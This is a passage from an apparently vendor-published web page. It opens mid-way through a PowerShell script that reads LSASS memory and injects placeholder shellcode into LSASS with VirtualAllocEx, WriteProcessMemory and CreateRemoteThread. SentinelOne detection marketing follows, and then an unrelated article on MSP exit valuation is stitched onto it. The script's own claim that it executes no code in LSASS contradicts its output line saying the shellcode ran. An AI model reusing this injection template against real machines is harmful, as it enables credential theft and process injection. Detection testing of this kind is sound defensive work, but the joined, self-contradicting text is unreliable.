$bytesRead = 0
$readAddr = [IntPtr]0x00400000 # Common readable address (harmless)
$readResult = [Win32]::ReadProcessMemory($hProcess, $readAddr, $buffer, $buffer.Length, [ref]$bytesRead)
if ($readResult) {
Write-Output “Read $bytesRead bytes from LSASS memory at $readAddr.”
} else {
Write-Output “ReadProcessMemory failed — AV/EDR or invalid memory region.”
}
# Dummy shellcode: NOP sled + RET
$shellcode = [byte[]] (
0x90, 0x90, 0x90, 0x90, 0xC3 # NOP NOP NOP NOP RET
)
# Allocate memory inside LSASS
$remoteAddr = [Win32]::VirtualAllocEx($hProcess, [IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
if ($remoteAddr -eq [IntPtr]::Zero) {
Write-Output “VirtualAllocEx failed.”
[Win32]::CloseHandle($hProcess)
return
}
# Write shellcode to LSASS
$bytesWritten = 0
$writeResult = [Win32]::WriteProcessMemory($hProcess, $remoteAddr, $shellcode, $shellcode.Length, [ref]$bytesWritten)
if (-not $writeResult) {
Write-Output “WriteProcessMemory failed.”
[Win32]::CloseHandle($hProcess)
return
}
Write-Output “Wrote $bytesWritten bytes of shellcode to LSASS.”
# Create remote thread to execute shellcode
$tid = 0
$hThread = [Win32]::CreateRemoteThread($hProcess, [IntPtr]::Zero, 0, $remoteAddr, [IntPtr]::Zero, 0, [ref]$tid)
if ($hThread -eq [IntPtr]::Zero) {
Write-Output “CreateRemoteThread failed. Execution not started.”
} else {
Write-Output “Shellcode executed in LSASS. Remote Thread ID: $tid”
}
[Win32]::CloseHandle($hProcess)
Write-Output “Simulation complete.”
}
# Run the attack simulation
Invoke-LSASSAttackSimulation
Script Highlights
All actions are performed in-memory; no files are written or dropped to disk.
Simulates real-world attacker TTPs: LSASS access, memory read, and process injection.
Safe for lab use; does not access real credentials or execute code in LSASS.
Run as a local administrator for full simulation and EDR visibility.
Mitigation Strategies
From a red team perspective, bypassing detection requires exploiting weaknesses in privilege management and process isolation. To counter these techniques, defenders should enforce least privilege across endpoints, ensuring that only necessary accounts have administrative access. Enabling features such as Credential Guard and LSASS Protected Process Light provides additional barriers against unauthorized memory access.
Regular patching is crucial for closing vulnerabilities that enable privilege escalation or process manipulation. Monitoring for unusual process behavior, especially when PowerShell or scripting engines interact with sensitive system processes, can provide early warning of an attack in progress. Implementing robust application control further limits the tools available to an attacker, reducing the risk of successful credential dumping or injection.
How SentinelOne Responds
SentinelOne leverages behavioral AI to detect the tactics used in this simulation. When the script attempts to open a handle to LSASS, SentinelOne’s agent recognizes the suspicious access pattern and raises an alert. Attempts to read or write memory in another process, particularly LSASS, are correlated with credential dumping and process injection techniques. The platform generates actionable alerts, providing visibility into the process tree and the sequence of actions taken.
This highlights how SentinelOne’s behavioral analytics can identify and alert on live memory attacks and process manipulation, even when the activity originates from legitimate tools in an interactive session.
Even though S1 has successfully mitigated the threat, this will not be the case for all endpoint security tools. Legacy antivirus vendors that rely on signatures would not catch such behaviors. And even some EDRs do not have the built in logic or AI adaptability to catch such tradecraft.
From the SentinelOne eyes
SentinelOne dashboard with suspicious actions, malware, etc.
This is how the SentinelOne dashboard allows you to show the incident, investigate and behave as an analyst.
The Endpoint view with the SentinelOne agent and its blocking status.
The script and the pop-up blocked
When the script runs, you can view the behavior from the endpoint and how SentinelOne tagged it.
Because the entire operation takes place in memory, traditional antivirus solutions are likely to miss it. SentinelOne’s in-memory analytics and real-time monitoring ensure that even fileless attacks are identified and stopped. Security teams can quickly investigate the alert, trace the activity back to its source, and initiate response actions such as isolating the endpoint or terminating the offending process.
By simulating these techniques, you can validate that SentinelOne’s detection and response capabilities are effective against the latest attacker tradecraft. Continuous validation is essential for maintaining a robust security posture in an environment where adversaries are constantly evolving.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
Is it next month? A year from now? Who would be the ideal buyer? What does the exit process involve? What will happen to your employees once the paperwork goes through?
These are all genuine questions almost every MSP ponders when thinking ahead, especially during a down market when revenue streams are unpredictable, as clients become more reluctant to hire any external service providers. Or maybe you’re ready to retire and enjoy your free time traveling the world.
The decision to sell isn’t just about timing. It’s about readiness.
But before you book that international cruise or sign any term sheet or NDA, it’s important to have a clear understanding of how the process works and what to expect as you prepare to move forward.
This guide will walk you through the key financial metrics that matter, potential pitfalls to avoid, and why cybersecurity can be the game-changer in elevating your business valuation.
Assigning a Valuation to Your MSP Business
Numbers tell the story when it comes to maximizing valuation. The first question a potential buyer will ask is whether you’re running a profitable MSP. More importantly, they’ll want to know how sustainable those profit margins are against current market conditions
Buyers will typically look beyond a traditional hockey stick forecast and focus on specific KPIs when evaluating your business. These KPIs include monthly recurring revenue (MRR), client retention rates, customer acquisition cost (CAC), churn rate, gross margin, customer lifetime value (CLV), and overall growth potential. These metrics matter a lot.
They will also evaluate your current tech stack and perform a thorough due diligence assessment to identify any potential risks that could impact scalability, security, or operational efficiency, which can delay or derail the acquisition process.
Are your revenue streams built on long-term, recurring contracts? Have you optimized pricing for inflation, EBITDA multiples, and long-term value creation?
As an MSP, you must structure and scale your pricing models to adjust for inflation and uncertainty, EBITDA multiple optimization, and long-term value creation. The potential buyer must understand if your business is growing year-over-year (YoY) or whether you’re simply “floating numbers around on a balance sheet” without any real evidence to support those claims.
That’s where Quality of Earnings (QOE) becomes a deciding factor in the pre-sale valuation process. A QOE report helps validate that your revenue streams are supported by healthy profit margins and long-term client relationships, rather than sporadic projects or unpredictable cash flow that could deter a potential buyer from agreeing to your terms.
Whether it’s a large-scale M&A or a strategic acquisition by a private equity firm, the new buyer is looking for sustainable month-over-month (MoM) growth, not creative accounting. They’re not only buying into an existing business but venturing into a long-term investment that will generate continuous cash flow, accelerate their market position, support expansion plans, and deliver predictable returns as soon as the deal closes.
That’s why they also cannot afford to take any security risks.
How Cybersecurity Can Help Enhance Exit Valuation
There is one element that can drastically enhance the valuation of your MSP business.
Cybersecurity.
Is your business prepared to handle a ransomware attack?
According to data from a recent IT-ISAC report, there were 1,537 ransomware attacks reported in Q1 2025, nearly triple the number reported in Q1 2024. Without effective cybersecurity measures, those threats further compound buyer hesitation during the due diligence process.
If one of your clients had their data compromised, it could trigger many red flags regarding your security controls, incident response maturity, data protection policies, liability exposure level, and overall risk posture, leading to a lower valuation, loss of confidence, and removing the trust barrier needed to complete the deal, or worse, cause the buyer to walk away entirely.
Are your cybersecurity investments paying dividends, or will they cost the buyer more in terms of technical debt, integration challenges, or compliance risks?
Having effective cybersecurity solutions in place helps reassure buyers that your MSP is resilient and prepared to handle major threats, such as ransomware or phishing. It also demonstrates a commitment to protecting client data, maintaining regulatory compliance, and delivering on ROI from existing cybersecurity investments before you sign that Letter of Intent (LOI) and draw up a contract.
It also strengthens buyer confidence in the long-term viability and profitability of your business, enhancing valuation with revenue-driven KPIs to justify the asking price and positioning your MSP as a trusted partner. A strong cybersecurity posture can be a key differentiator in deal negotiations, to help close the sale on favorable terms for both parties.
Exit Plan: Preparing the New Buyer for Success with Guardz
Ready to finalize that deal?
Take a consolidated cybersecurity approach to your long-range planning and strategic business exit with Guardz.
The Guardz AI + Human-Led MDR unifies SentinelOne EDR, ITDR, and other platform detections into a single contextual system of normalized incidents, delivering 24/7 threat detection, triage, response, and incident support.
Enhance the value of your MSP even further with business-related cybersecurity KPIs and tool consolidation. Gain the confidence to justify your business valuation to buyers and ensure a smooth transaction for all parties involved.
Join thousands of MSPs successfully protecting their clients with Guardz.
About Guardz Guardz is on a mission to create a safer digital world by empowering Managed Service Providers (MSPs). Their goal is to proactively secure and insure Small and Medium Enterprises (SMEs) against ever-evolving threats while simultaneously creating new revenue streams, all on one unified platform.
About Version 2 Limited Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.
Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.